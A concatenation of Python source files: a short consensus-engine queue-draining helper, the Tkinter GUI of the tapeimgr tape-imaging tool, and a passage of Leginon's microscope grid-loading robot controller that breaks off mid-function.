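# _process above turns validator messages into (message_type, data) tuples and
# _driver_loop pushes them onto the updates Queue handed to the engine. A
# minimal sketch of the consuming side; handle_block_new is a hypothetical
# callback and only BLOCK_NEW updates are dispatched in this illustration.
def _example_drain_updates(updates, handle_block_new, poll_seconds=0.1):
    """Sketch of how an engine might drain the updates queue filled above."""
    import queue  # local import; the module itself only imports Queue
    while True:  # a real engine would also check a stop flag
        try:
            type_tag, data = updates.get(timeout=poll_seconds)
        except queue.Empty:
            continue
        if type_tag == Message.CONSENSUS_NOTIFY_BLOCK_NEW:
            handle_block_new(data)  # data is the new block from the validator
        # other notification types would be dispatched similarly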
|
gui.py
|
#! /usr/bin/env python3
"""
Tapeimgr, automated reading of tape
Graphical user interface
Author: Johan van der Knijff
Research department, KB / National Library of the Netherlands
"""
import sys
import os
import time
import threading
import logging
import queue
import uuid
from pathlib import Path
import tkinter as tk
from tkinter import filedialog as tkFileDialog
from tkinter import scrolledtext as ScrolledText
from tkinter import messagebox as tkMessageBox
from tkinter import ttk
from tkfilebrowser import askopendirname
from .tape import Tape
from . import config
class tapeimgrGUI(tk.Frame):
"""This class defines the graphical user interface + associated functions
for associated actions
"""
def __init__(self, parent, *args, **kwargs):
"""Initiate class"""
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
# Logging stuff
self.logger = logging.getLogger()
# Create a logging handler using a queue
self.log_queue = queue.Queue(-1)
self.queue_handler = QueueHandler(self.log_queue)
# Create tape instance
self.tape = Tape()
self.t1 = None
# Read configuration file
self.tape.getConfiguration()
# Set dirOut, depending on whether value from config is a directory
if os.path.isdir(self.tape.defaultDir):
self.tape.dirOut = self.tape.defaultDir
else:
self.tape.dirOut = os.path.expanduser("~")
# Build the GUI
self.build_gui()
def on_quit(self, event=None):
"""Quit tapeimgr"""
os._exit(0)
def on_submit(self, event=None):
"""fetch and validate entered input, and start processing"""
# This flag is true if all input validates
inputValidateFlag = True
# Fetch entered values (strip any leading / trailing whitespace characters)
self.tape.tapeDevice = self.tapeDevice_entry.get().strip()
self.tape.initBlockSize = self.initBlockSize_entry.get().strip()
self.tape.files = self.files_entry.get().strip()
self.tape.prefix = self.prefix_entry.get().strip()
self.tape.extension = self.extension_entry.get().strip()
self.tape.identifier = self.identifier_entry.get().strip()
self.tape.description = self.description_entry.get().strip()
self.tape.notes = self.notes_entry.get(1.0, tk.END).strip()
self.tape.fillBlocks = self.fBlocks.get()
# Validate input
self.tape.validateInput()
# Show error message for any parameters that didn't pass validation
if not self.tape.dirOutIsDirectory:
inputValidateFlag = False
msg = ("Output directory doesn't exist:\n" + self.tape.dirOut)
tkMessageBox.showerror("ERROR", msg)
if not self.tape.dirOutIsWritable:
inputValidateFlag = False
msg = ('Cannot write to directory ' + self.tape.dirOut)
tkMessageBox.showerror("ERROR", msg)
if not self.tape.deviceAccessibleFlag:
inputValidateFlag = False
msg = ('Tape device is not accessible')
tkMessageBox.showerror("ERROR", msg)
if not self.tape.blockSizeIsValid:
inputValidateFlag = False
msg = ('Block size not valid')
tkMessageBox.showerror("ERROR", msg)
if not self.tape.filesIsValid:
inputValidateFlag = False
msg = ('Files value not valid\n'
'(must be comma-delimited string of integer numbers, or empty)')
tkMessageBox.showerror("ERROR", msg)
# Ask confirmation if output files exist already
outDirConfirmFlag = True
if self.tape.outputExistsFlag:
msg = ('writing to ' + self.tape.dirOut + ' will overwrite existing files!\n'
'press OK to continue, otherwise press Cancel ')
outDirConfirmFlag = tkMessageBox.askokcancel("Overwrite files?", msg)
if inputValidateFlag and outDirConfirmFlag:
# Start logger
successLogger = True
try:
self.setupLogger()
# Start polling log messages from the queue
self.after(100, self.poll_log_queue)
except OSError:
# Something went wrong while trying to write to the log file
msg = ('error trying to write log file to ' + self.tape.logFile)
tkMessageBox.showerror("ERROR", msg)
successLogger = False
if successLogger:
# Disable data entry widgets
self.outDirButton_entry.config(state='disabled')
self.tapeDevice_entry.config(state='disabled')
self.initBlockSize_entry.config(state='disabled')
self.decreaseBSButton.config(state='disabled')
self.increaseBSButton.config(state='disabled')
self.files_entry.config(state='disabled')
self.prefix_entry.config(state='disabled')
self.extension_entry.config(state='disabled')
self.fillblocks_entry.config(state='disabled')
self.identifier_entry.config(state='disabled')
self.uuidButton.config(state='disabled')
self.description_entry.config(state='disabled')
self.notes_entry.config(state='disabled')
self.start_button.config(state='disabled')
self.quit_button.config(state='disabled')
# Launch tape processing function in a separate thread
self.t1 = threading.Thread(target=self.tape.processTape)
self.t1.start()
def selectOutputDirectory(self, event=None):
"""Select output directory"""
dirInit = self.tape.dirOut
self.tape.dirOut = askopendirname(initialdir=dirInit)
if self.tape.dirOut != '':
self.outDirLabel['text'] = self.tape.dirOut
def decreaseBlocksize(self):
"""Decrease value of initBlockSize"""
try:
blockSizeOld = int(self.initBlockSize_entry.get().strip())
except ValueError:
# Reset if user manually entered something weird
blockSizeOld = int(self.tape.initBlockSizeDefault)
blockSizeNew = max(blockSizeOld - 512, 512)
self.initBlockSize_entry.delete(0, tk.END)
self.initBlockSize_entry.insert(tk.END, str(blockSizeNew))
def increaseBlocksize(self):
"""Increase value of initBlockSize"""
try:
blockSizeOld = int(self.initBlockSize_entry.get().strip())
except ValueError:
# Reset if user manually entered something weird
blockSizeOld = int(self.tape.initBlockSizeDefault)
blockSizeNew = blockSizeOld + 512
self.initBlockSize_entry.delete(0, tk.END)
self.initBlockSize_entry.insert(tk.END, str(blockSizeNew))
def insertUUID(self, event=None):
"""Insert UUID into identifier field"""
myID = str(uuid.uuid1())
self.identifier_entry.delete(0, tk.END)
self.identifier_entry.insert(tk.END, myID)
def build_gui(self):
"""Build the GUI"""
self.root.title('tapeimgr v.' + config.version)
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='w')
self.grid_columnconfigure(0, weight=0, pad=0)
self.grid_columnconfigure(1, weight=0, pad=0)
self.grid_columnconfigure(2, weight=0, pad=0)
self.grid_columnconfigure(3, weight=0, pad=0)
# Entry elements
ttk.Separator(self, orient='horizontal').grid(column=0, row=0, columnspan=4, sticky='ew')
# Output Directory
self.outDirButton_entry = tk.Button(self,
text='Select Output Directory',
underline=14,
command=self.selectOutputDirectory,
width=20)
self.outDirButton_entry.grid(column=0, row=3, sticky='w')
self.outDirLabel = tk.Label(self, text=self.tape.dirOut)
self.outDirLabel.update()
self.outDirLabel.grid(column=1, row=3, sticky='w')
ttk.Separator(self, orient='horizontal').grid(column=0, row=5, columnspan=4, sticky='ew')
# Tape Device
tk.Label(self, text='Tape Device').grid(column=0, row=6, sticky='w')
self.tapeDevice_entry = tk.Entry(self, width=20)
self.tapeDevice_entry['background'] = 'white'
self.tapeDevice_entry.insert(tk.END, self.tape.tapeDevice)
self.tapeDevice_entry.grid(column=1, row=6, sticky='w')
# Initial Block Size
tk.Label(self, text='Initial Block Size').grid(column=0, row=7, sticky='w')
self.initBlockSize_entry = tk.Entry(self, width=20)
self.initBlockSize_entry['background'] = 'white'
self.initBlockSize_entry.insert(tk.END, self.tape.initBlockSize)
self.initBlockSize_entry.grid(column=1, row=7, sticky='w')
self.decreaseBSButton = tk.Button(self, text='-', command=self.decreaseBlocksize, width=1)
self.decreaseBSButton.grid(column=1, row=7, sticky='e')
self.increaseBSButton = tk.Button(self, text='+', command=self.increaseBlocksize, width=1)
self.increaseBSButton.grid(column=2, row=7, sticky='w')
# Files
tk.Label(self, text='Files (comma-separated list)').grid(column=0, row=8, sticky='w')
self.files_entry = tk.Entry(self, width=20)
self.files_entry['background'] = 'white'
self.files_entry.insert(tk.END, self.tape.files)
self.files_entry.grid(column=1, row=8, sticky='w')
# Prefix
tk.Label(self, text='Prefix').grid(column=0, row=9, sticky='w')
self.prefix_entry = tk.Entry(self, width=20)
self.prefix_entry['background'] = 'white'
self.prefix_entry.insert(tk.END, self.tape.prefix)
self.prefix_entry.grid(column=1, row=9, sticky='w')
# Extension
tk.Label(self, text='Extension').grid(column=0, row=10, sticky='w')
self.extension_entry = tk.Entry(self, width=20)
self.extension_entry['background'] = 'white'
self.extension_entry.insert(tk.END, self.tape.extension)
self.extension_entry.grid(column=1, row=10, sticky='w')
# Fill failed blocks
tk.Label(self, text='Fill failed blocks').grid(column=0, row=11, sticky='w')
self.fBlocks = tk.BooleanVar()
self.fBlocks.set(self.tape.fillBlocks)
self.fillblocks_entry = tk.Checkbutton(self, variable=self.fBlocks)
self.fillblocks_entry.grid(column=1, row=11, sticky='w')
ttk.Separator(self, orient='horizontal').grid(column=0, row=12, columnspan=4, sticky='ew')
# Identifier entry field
tk.Label(self, text='Identifier').grid(column=0, row=13, sticky='w')
self.identifier_entry = tk.Entry(self, width=20)
self.identifier_entry['background'] = 'white'
self.identifier_entry.insert(tk.END, self.tape.identifier)
self.identifier_entry.grid(column=1, row=13, sticky='w')
self.uuidButton = tk.Button(self, text='UUID', underline=0,
command=self.insertUUID, width=2)
self.uuidButton.grid(column=1, row=13, sticky='e')
# Description entry field
tk.Label(self, text='Description').grid(column=0, row=14, sticky='w')
self.description_entry = tk.Entry(self, width=35)
self.description_entry['background'] = 'white'
self.description_entry.insert(tk.END, self.tape.description)
self.description_entry.grid(column=1, row=14, sticky='w', columnspan=1)
# Notes entry field
tk.Label(self, text='Notes').grid(column=0, row=15, sticky='w')
self.notes_entry = tk.Text(self, height=6, width=35)
self.notes_entry['background'] = 'white'
self.notes_entry.insert(tk.END, self.tape.notes)
self.notes_entry.grid(column=1, row=15, sticky='w', columnspan=1)
ttk.Separator(self, orient='horizontal').grid(column=0, row=16, columnspan=4, sticky='ew')
self.start_button = tk.Button(self,
text='Start',
width=10,
underline=0,
command=self.on_submit)
self.start_button.grid(column=1, row=17, sticky='w')
self.quit_button = tk.Button(self,
text='Exit',
width=10,
underline=0,
command=self.on_quit)
self.quit_button.grid(column=1, row=17, sticky='e')
ttk.Separator(self, orient='horizontal').grid(column=0, row=18, columnspan=4, sticky='ew')
# Add ScrolledText widget to display logging info
self.st = ScrolledText.ScrolledText(self, state='disabled', height=15)
self.st.configure(font='TkFixedFont')
self.st['background'] = 'white'
self.st.grid(column=0, row=19, sticky='ew', columnspan=4)
# Define bindings for keyboard shortcuts: buttons
self.root.bind_all('<Control-Key-d>', self.selectOutputDirectory)
self.root.bind_all('<Control-Key-s>', self.on_submit)
self.root.bind_all('<Control-Key-e>', self.on_quit)
self.root.bind_all('<Control-Key-u>', self.insertUUID)
for child in self.winfo_children():
child.grid_configure(padx=5, pady=5)
# Display message and exit if config file could not be read
if not self.tape.configSuccess:
msg = ("Error reading configuration file! \n" +
"Run '(sudo) tapeimgr-config' to fix this.")
errorExit(msg)
def reset_gui(self, dirOut):
"""Reset the GUI"""
# Create new tape instance
self.tape = Tape()
# Read configuration
self.tape.getConfiguration()
# Set dirOut
self.tape.dirOut = dirOut
# Logging stuff
self.logger = logging.getLogger()
# Create a logging handler using a queue
self.log_queue = queue.Queue(-1)
self.queue_handler = QueueHandler(self.log_queue)
# enable data entry widgets
self.outDirButton_entry.config(state='normal')
self.tapeDevice_entry.config(state='normal')
self.initBlockSize_entry.config(state='normal')
self.decreaseBSButton.config(state='normal')
self.increaseBSButton.config(state='normal')
self.files_entry.config(state='normal')
self.prefix_entry.config(state='normal')
self.extension_entry.config(state='normal')
self.fillblocks_entry.config(state='normal')
self.identifier_entry.config(state='normal')
self.uuidButton.config(state='normal')
self.description_entry.config(state='normal')
self.notes_entry.config(state='normal')
self.start_button.config(state='normal')
self.quit_button.config(state='normal')
# Reset all entry widgets
self.outDirLabel['text'] = self.tape.dirOut
self.tapeDevice_entry.delete(0, tk.END)
self.tapeDevice_entry.insert(tk.END, self.tape.tapeDevice)
self.initBlockSize_entry.delete(0, tk.END)
self.initBlockSize_entry.insert(tk.END, self.tape.initBlockSize)
self.files_entry.delete(0, tk.END)
self.files_entry.insert(tk.END, self.tape.files)
self.prefix_entry.delete(0, tk.END)
self.prefix_entry.insert(tk.END, self.tape.prefix)
self.extension_entry.delete(0, tk.END)
self.extension_entry.insert(tk.END, self.tape.extension)
self.identifier_entry.delete(0, tk.END)
self.identifier_entry.insert(tk.END, self.tape.identifier)
self.description_entry.delete(0, tk.END)
self.description_entry.insert(tk.END, self.tape.description)
self.notes_entry.delete(1.0, tk.END)
self.notes_entry.insert(tk.END, self.tape.notes)
self.fBlocks.set(self.tape.fillBlocks)
self.start_button.config(state='normal')
self.quit_button.config(state='normal')
def setupLogger(self):
"""Set up logger configuration"""
# Basic configuration
logging.basicConfig(filename=self.tape.logFile,
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
self.logger = logging.getLogger()
# This sets the console output format (slightly different from basicConfig!)
formatter = logging.Formatter('%(levelname)s: %(message)s')
self.queue_handler.setFormatter(formatter)
self.logger.addHandler(self.queue_handler)
def display(self, record):
"""Display log record in scrolledText widget"""
msg = self.queue_handler.format(record)
self.st.configure(state='normal')
self.st.insert(tk.END, msg + '\n', record.levelname)
self.st.configure(state='disabled')
# Autoscroll to the bottom
self.st.yview(tk.END)
def poll_log_queue(self):
"""Check every 100ms if there is a new message in the queue to display"""
while True:
try:
record = self.log_queue.get(block=False)
except queue.Empty:
break
else:
self.display(record)
self.after(100, self.poll_log_queue)
class QueueHandler(logging.Handler):
"""Class to send logging records to a queue
It can be used from different threads
The ConsoleUi class polls this queue to display records in a ScrolledText widget
Taken from https://github.com/beenje/tkinter-logging-text-widget/blob/master/main.py
"""
def __init__(self, log_queue):
super().__init__()
self.log_queue = log_queue
def emit(self, record):
self.log_queue.put(record)
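# Illustrative wiring sketch (assumption: this simply mirrors how the GUI class
# above already uses QueueHandler in reset_gui/setupLogger/poll_log_queue; it is
# a compact reference in comments, not additional runtime code):
#
#   log_queue = queue.Queue(-1)
#   queue_handler = QueueHandler(log_queue)
#   logging.getLogger().addHandler(queue_handler)   # records now land in log_queue
#   # a periodic Tk callback then drains the queue:
#   #   record = log_queue.get(block=False)
#   #   widget.insert(tk.END, queue_handler.format(record))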
def checkDirExists(dirIn):
"""Check if directory exists and exit if not"""
if not os.path.isdir(dirIn):
msg = ('directory ' + dirIn + ' does not exist!')
tkMessageBox.showerror("Error", msg)
sys.exit(1)
def errorExit(error):
"""Show error message in messagebox and then exit after user presses OK"""
tkMessageBox.showerror("Error", error)
os._exit(1)
def main():
"""Main function"""
packageDir = os.path.dirname(os.path.abspath(__file__))
root = tk.Tk()
root.iconphoto(True, tk.PhotoImage(file=os.path.join(packageDir, 'icons', 'tapeimgr.png')))
myGUI = tapeimgrGUI(root)
# This ensures application quits normally if user closes window
root.protocol('WM_DELETE_WINDOW', myGUI.on_quit)
while True:
try:
root.update_idletasks()
root.update()
time.sleep(0.1)
if myGUI.tape.finishedFlag:
myGUI.t1.join()
#myGUI.logger.removeHandler(myGUI.queue_handler)
#myGUI.queue_handler.close()
handlers = myGUI.logger.handlers[:]
for handler in handlers:
handler.close()
myGUI.logger.removeHandler(handler)
if myGUI.tape.tapeDeviceIOError:
# Tape device not accessible
msg = ('Cannot access tape device ' + myGUI.tape.tapeDevice +
                           '. Check that the device exists, and that tapeimgr is run as root')
errorExit(msg)
elif myGUI.tape.successFlag:
# Tape extraction completed with no errors
msg = ('Tape processed successfully without errors')
tkMessageBox.showinfo("Success", msg)
else:
# Tape extraction resulted in errors
msg = ('One or more errors occurred while processing tape, '
'check log file for details')
tkMessageBox.showwarning("Errors occurred", msg)
# Reset dirOut to parent dir of current value (returns root
# dir if dirOut is root)
dirOutNew = str(Path(myGUI.tape.dirOut).parent)
# Reset the GUI
myGUI.reset_gui(dirOutNew)
except Exception as e:
# Unexpected error
msg = 'An unexpected error occurred, see log file for details'
logging.error(e, exc_info=True)
errorExit(msg)
if __name__ == "__main__":
main()
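# Note on the event loop in main(): it calls update_idletasks()/update() in its
# own while loop (with a 0.1 s sleep) instead of root.mainloop(), so the main
# thread can also watch tape.finishedFlag, join the finished worker thread (t1),
# report success or failure, and reset the GUI between runs.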
|
robot.py
|
#
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from PIL import Image
import sys
import threading
import time
from leginon import leginondata
import emailnotification
import event
import instrument
import node
import project
import gui.wx.Robot
# ...
def seconds2str(seconds):
seconds = int(seconds)
minute = 60
hour = 60*minute
day = 24*hour
week = 7*day
weeks = seconds / week
string = ''
if weeks:
if weeks == 1:
value = ''
else:
value = 's'
string += '%i week%s, ' % (weeks, value)
seconds %= week
days = seconds / day
if days or string:
if days == 1:
value = ''
else:
value = 's'
string += '%i day%s, ' % (days, value)
seconds %= day
hours = seconds / hour
if hours or string:
if hours == 1:
value = ''
else:
value = 's'
string += '%i hour%s, ' % (hours, value)
seconds %= hour
minutes = seconds / minute
if minutes or string:
if minutes == 1:
value = ''
else:
value = 's'
string += '%i minute%s, ' % (minutes, value)
seconds %= minute
if seconds or string:
if seconds == 1:
value = ''
else:
value = 's'
string += '%i second%s' % (seconds, value)
return string
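# Example output (hedged illustration; relies on the Python 2 integer division
# used above):
#   seconds2str(90061) -> '1 day, 1 hour, 1 minute, 1 second'
#   seconds2str(75)    -> '1 minute, 15 seconds'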
class TestCommunication(object):
def __init__(self):
self.gridNumber = -1
for i in range(11):
setattr(self, 'Signal' + str(i), 0)
class RobotException(Exception):
pass
class GridException(Exception):
pass
class GridQueueEmpty(GridException):
pass
class GridLoadError(GridException):
pass
class GridLoadFromTrayError(GridException):
pass
class GridUnloadError(GridException):
pass
def validateGridNumber(gridnumber):
if not isinstance(gridnumber, int):
return False
if gridnumber >= 1 and gridnumber <= 96:
return True
else:
return False
class Request(object):
def __init__(self):
self.event = threading.Event()
class ExitRequest(Request):
pass
class GridRequest(Request):
def __init__(self, number, gridid=None, node=None, griddata=None):
Request.__init__(self)
self.number = number
self.loaded = False
self.gridid = gridid
self.node = node
self.griddata = griddata
import Queue
class Robot(node.Node):
panelclass = gui.wx.Robot.Panel
eventinputs = node.Node.eventinputs + [event.TargetListDoneEvent,
event.UnloadGridEvent,
event.QueueGridEvent,
event.QueueGridsEvent,
event.MosaicDoneEvent]
eventoutputs = node.Node.eventoutputs + [event.MakeTargetListEvent,
event.GridLoadedEvent,
event.EmailEvent]
settingsclass = leginondata.RobotSettingsData
defaultsettings = {
'column pressure threshold': 3.5e-5,
'default Z position': -140e-6,
'simulate': False,
'turbo on': True,
'pause': False,
'grid tray': None,
'grid clear wait': False,
}
defaultcolumnpressurethreshold = 3.5e-5
defaultzposition = -140e-6
def __init__(self, id, session, managerlocation, **kwargs):
node.Node.__init__(self, id, session, managerlocation, **kwargs)
self.instrument = instrument.Proxy(self.objectservice, self.session)
self.timings = {}
self.gridnumber = None
self.startevent = threading.Event()
self.exitevent = threading.Event()
self.extractinfo = None
self.extractcondition = threading.Condition()
self.gridcleared = threading.Event()
self.usercontinue = threading.Event()
self.emailclient = emailnotification.EmailClient(self)
self.simulate = False
self.startnowait = False
self.traysFromDB()
self.queue = Queue.Queue()
threading.Thread(name='robot control queue handler thread',
target=self._queueHandler).start()
self.addEventInput(event.MosaicDoneEvent, self.handleGridDataCollectionDone)
self.addEventInput(event.TargetListDoneEvent,
self.handleGridDataCollectionDone)
self.addEventInput(event.QueueGridEvent, self.handleQueueGrid)
self.addEventInput(event.QueueGridsEvent, self.handleQueueGrids)
self.addEventInput(event.UnloadGridEvent, self.handleUnloadGrid)
self.start()
def traysFromDB(self):
		# NOTE: if two grid trays share the same label, this label -> id mapping is ambiguous
self.gridtrayids = {}
self.gridtraylabels = {}
try:
projectdata = project.ProjectData()
gridboxes = projectdata.getGridBoxes()
for i in gridboxes.getall():
self.gridtrayids[i['label']] = i['gridboxId']
self.gridtraylabels[i['gridboxId']] = i['label']
except Exception, e:
self.logger.error('Failed to connect to the project database: %s' % e)
def userContinue(self):
self.usercontinue.set()
def handleQueueGrids(self, ievent):
'''
Handle queue of grids from another node.
Wait for user to click start before inserting into the queue.
'''
# wait for user to start
		self.logger.info("Grid load request has been made, press 'Start' button to begin processing")
self.setStatus('user input')
self.startevent.clear()
self.startevent.wait()
nodename = ievent['node']
# insert all the grids before handling them
for gridid in ievent['grid IDs']:
number = self.getGridNumber(gridid)
while number is None:
self.setStatus('idle')
self.logger.info('Waiting for user to switch tray')
self.setStatus('user input')
self.panel.onWaitForTrayChanged()
self.startevent.clear()
self.startevent.wait()
number = self.getGridNumber(gridid)
request = GridRequest(number, gridid, nodename)
self.queue.put(request)
self.startnowait = True
self._queueHandler()
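	# Expected payload (inferred from this handler and handleQueueGrid below):
	#   ievent['node']     - name of the requesting node
	#   ievent['grid IDs'] - list of project-database grid IDs to load, in order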
def handleQueueGrid(self, ievent):
newevent = {}
newevent['node'] = ievent['node']
newevent['grid IDs'] = [ievent['grid ID'],]
self.handleQueueGrids(newevent)
def handleUnloadGrid(self, evt):
gridid = evt['grid ID']
node = evt['node']
self.extractcondition.acquire()
self.extractinfo = (gridid, node)
self.extractcondition.notify()
self.extractcondition.release()
def _queueHandler(self):
		self.logger.info('_queueHandler: simulate=%s, setting=%s' % (self.simulate, self.settings['simulate']))
if self.simulate:
self.communication = TestCommunication()
communication_good = TestCommunication()
else:
try:
import pythoncom
import win32com.client
pythoncom.CoInitializeEx(pythoncom.COINIT_MULTITHREADED)
communication_good = win32com.client.Dispatch(
'RobotCommunications.Signal')
self.communication = communication_good
except:
self.logger.warning(
'Cannot initialize robot communications, starting in simulation mode'
)
self.simulate = True
self.communication = TestCommunication()
communication_good = TestCommunication()
request = None
self.communication.Signal11 = int(self.settings['grid clear wait'])
while True:
### need to wait if something goes wrong
if not self.startnowait:
self.usercontinue.clear()
self.usercontinue.wait()
if self.exitevent.isSet():
break
while True:
try:
request = self.queue.get(block=False)
if isinstance(request, ExitRequest):
break
except Queue.Empty:
request = self.getUserGridRequest()
if request is None:
self.startnowait = False
break
gridid = request.gridid
evt = event.GridLoadedEvent()
evt['request node'] = request.node
evt['grid'] = leginondata.GridData(initializer={'grid ID': gridid})
evt['status'] = 'failed'
gridnumber = request.number
self.selectGrid(gridnumber)
if gridnumber is None:
evt['status'] = 'invalid'
self.outputEvent(evt)
return
if self.settings['simulate']:
self.communication = TestCommunication()
else:
self.communication = communication_good
self.setStatus('processing')
self.selectGrid(gridnumber)
self.logger.info('grid selected')
self.gridnumber = gridnumber
try:
griddata = self.insert()
except GridLoadError:
self.gridnumber = None
continue
except GridLoadFromTrayError:
self.gridnumber = None
self.startnowait = True
self.outputEvent(evt)
request.event.set()
continue
self.setStatus('idle')
evt['grid'] = griddata
if griddata is None:
break
self.startnowait = False
if hasattr(request, 'loaded'):
evt['status'] = 'ok'
if hasattr(request, 'griddata'):
request.griddata = griddata
self.outputEvent(evt)
request.event.set()
self.extractcondition.acquire()
if request.gridid is None and request.node is None:
self.panel.gridInserted()
while (self.extractinfo is None
or self.extractinfo != (request.gridid, request.node)):
self.extractcondition.wait()
if self.settings['simulate']:
self.communication = TestCommunication()
else:
self.communication = communication_good
self.setStatus('processing')
self.extractinfo = None
self.extractcondition.release()
self.extract()
self.gridnumber = None
self.setStatus('idle')
self.setStatus('idle')
self.panel.gridQueueEmpty()
del self.communication
def startProcessing(self):
self.startevent.set()
def exit(self):
self.exitevent.set()
self.startevent.set()
node.Node.exit(self)
def lockScope(self):
self.logger.info('Locking scope...')
self.instrument.tem.lock()
self.logger.info('Scope locked.')
def unlockScope(self):
self.logger.info('Unlocking scope...')
self.instrument.tem.unlock()
self.logger.info('Scope unlocked.')
def zeroStage(self):
while True:
self.logger.info('Zeroing stage position...')
self.instrument.tem.StagePosition = {'x': 0.0, 'y': 0.0, 'z': 0.0, 'a': 0.0}
if self.stageIsZeroed():
break
else:
self.logger.info('Stage is not zeroed, trying again...')
self.logger.info('Stage position is zeroed.')
def stageIsZeroed(self, xyzlimit=1e-6, alimit=0.001):
stage = self.instrument.tem.StagePosition
x = abs(stage['x'])
y = abs(stage['y'])
z = abs(stage['z'])
a = abs(stage['a'])
if x<xyzlimit and y<xyzlimit and z<xyzlimit and a<alimit:
return True
else:
return False
def moveStagePositionZ(self,zval):
self.logger.info("Move stage position Z to: %s",zval)
self.instrument.tem.StagePosition = {'z': zval}
def holderNotInScope(self):
self.logger.info('Verifying there is no holder inserted...')
self.waitScope('HolderStatus', 'not inserted')
self.logger.info('No holder currently inserted.')
def holderInScope(self):
self.logger.info('Verifying holder is inserted...')
self.waitScope('HolderStatus', 'inserted')
		self.logger.info('Holder is currently inserted.')
def vacuumReady(self):
self.logger.info('Verifying vacuum is ready...')
self.waitScope('VacuumStatus', 'ready', 0.25)
self.logger.info('Vacuum is ready.')
def openColumnValves(self):
self.logger.info('Opening column valves...')
self.instrument.tem.ColumnValvePosition = 'open'
self.logger.info('Verifying column valves are open...')
self.waitScope('ColumnValvePosition', 'open', 0.25)
self.logger.info('Column valves are open.')
def closeColumnValves(self):
self.logger.info('Closing column valves...')
self.instrument.tem.ColumnValvePosition = 'closed'
self.logger.info('Verifying column valves are closed...')
self.waitScope('ColumnValvePosition', 'closed', 0.25)
self.logger.info('Column valves are closed.')
def turboPumpOn(self):
self.logger.info('Turning on turbo pump...')
self.instrument.tem.TurboPump = 'on'
self.logger.info('Verifying turbo pump is on...')
self.waitScope('TurboPump', 'on', 0.25)
self.logger.info('Turbo pump is on.')
def turboPumpOff(self):
self.logger.info('Turning off turbo pump...')
self.instrument.tem.TurboPump = 'off'
#self.logger.info('Verifying turbo pump is off...')
#self.waitScope('TurboPump', 'off', 0.25)
self.logger.info('Turbo pump is off.')
def stageReady(self):
self.logger.info('Waiting for stage to be ready...')
self.waitScope('StageStatus', 'ready', 0.25)
		self.logger.info('Stage is ready.')
def setHolderType(self):
#type = 'single tilt'
type = 'cryo'
self.logger.info('Setting holder type to %s...' % (type,))
self.instrument.tem.HolderType = type
self.logger.info('Verifying holder type is set to %s...' % (type,))
self.waitScope('HolderType', type, 0.25)
self.logger.info('Holder type is set to %s.' % (type,))
def getColumnPressureThreshold(self):
threshold = self.settings['column pressure threshold']
if threshold is None:
threshold = self.defaultcolumnpressurethreshold
return threshold
def getDefaultZPosition(self):
defzposition = self.settings['default Z position']
if defzposition is None:
defzposition = self.defaultzposition
return defzposition
def checkColumnPressure(self):
threshold = self.getColumnPressureThreshold()
self.logger.info('Checking column pressure...')
while self.instrument.tem.ColumnPressure > threshold:
time.sleep(0.1)
threshold = self.getColumnPressureThreshold()
self.logger.info('Column pressure is below threshold.')
def checkHighTensionOn(self):
self.logger.info('Checking high tension state...')
self.waitScope('HighTensionState', 'on', 0.25)
self.logger.info('High tension is on.')
def insertCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Inserting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = True
self.waitScope('Inserted', True, 0.25)
self.logger.info('%s camera is inserted.' % ccdcamera)
def retractCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Retracting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = False
self.waitScope('Inserted', False, 0.25)
self.logger.info('%s camera is retracted.' % ccdcamera)
def scopeReadyForInsertion1(self):
self.logger.info('Readying microscope for insertion step 1...')
self.zeroStage()
self.holderNotInScope()
self.vacuumReady()
self.closeColumnValves()
self.stageReady()
self.logger.info('Microscope ready for insertion step 1.')
def scopeReadyForInsertion2(self):
self.logger.info('Readying microscope for insertion step 2...')
self.setHolderType()
self.stageReady()
self.logger.info('Microscope ready for insertion step 2.')
def scopeReadyForExtraction(self):
self.logger.info('Readying microscope for extraction...')
self.closeColumnValves()
self.retractCameras()
self.zeroStage()
self.holderInScope()
self.vacuumReady()
self.stageReady()
self.logger.info('Microscope ready for extraction.')
def scopeReadyForImaging(self):
self.logger.info('Readying microscope for imaging...')
if not self.settings['turbo on']:
self.turboPumpOff()
self.insertCameras()
self.checkHighTensionOn()
self.vacuumReady()
zposition = self.getDefaultZPosition()
if zposition:
self.moveStagePositionZ(zposition)
self.checkColumnPressure()
self.openColumnValves()
self.logger.info('Microscope ready for imaging.')
def signalRobotToInsert1(self):
self.logger.info('Signaling robot to begin insertion step 1')
self.communication.Signal1 = 1
self.logger.info('Signaled robot to begin insertion step 1')
def signalRobotToInsert2(self):
self.logger.info('Signaling robot to begin insertion step 2')
self.communication.Signal3 = 1
self.logger.info('Signaled robot to begin insertion step 2')
def signalRobotToExtract(self):
self.logger.info('Signaling robot to begin extraction')
self.communication.Signal6 = 1
self.logger.info('Signaled robot to begin extraction')
def emailGridClear(self, gridnumber):
m = 'Grid #%s failed to be removed from specimen holder properly'
subject = m % gridnumber
text = 'Reply to this message if grid is not in the specimen holder.\n' + \
'An image of the specimen holder is attached.'
time.sleep(5.0)
try:
			# Attaching an image of the holder is not implemented; raising here
			# drops into the bare except below so that imagestring stays None.
			raise NotImplementedError
image = Image.open(imagefilename)
imagestring = emailnotification.PILImage2String(image)
except:
imagestring = None
self.emailclient.sendAndSet(self.gridcleared, subject, text, imagestring)
def waitForGridClear(self):
self.gridcleared.clear()
self.logger.warning('Waiting for confirmation that grid is clear')
self.setStatus('user input')
self.emailGridClear(self.gridnumber)
self.panel.clearGrid()
self.gridcleared.wait()
self.gridcleared = threading.Event()
self.communication.Signal10 = 1
def autoGridClear(self):
self.gridcleared.clear()
self.logger.info('Auto probe clearing')
self.communication.Signal10 = 1
def gridCleared(self):
self.gridcleared.set()
def waitForRobotToInsert1(self):
self.logger.info('Waiting for robot to complete insertion step 1')
while not self.communication.Signal2:
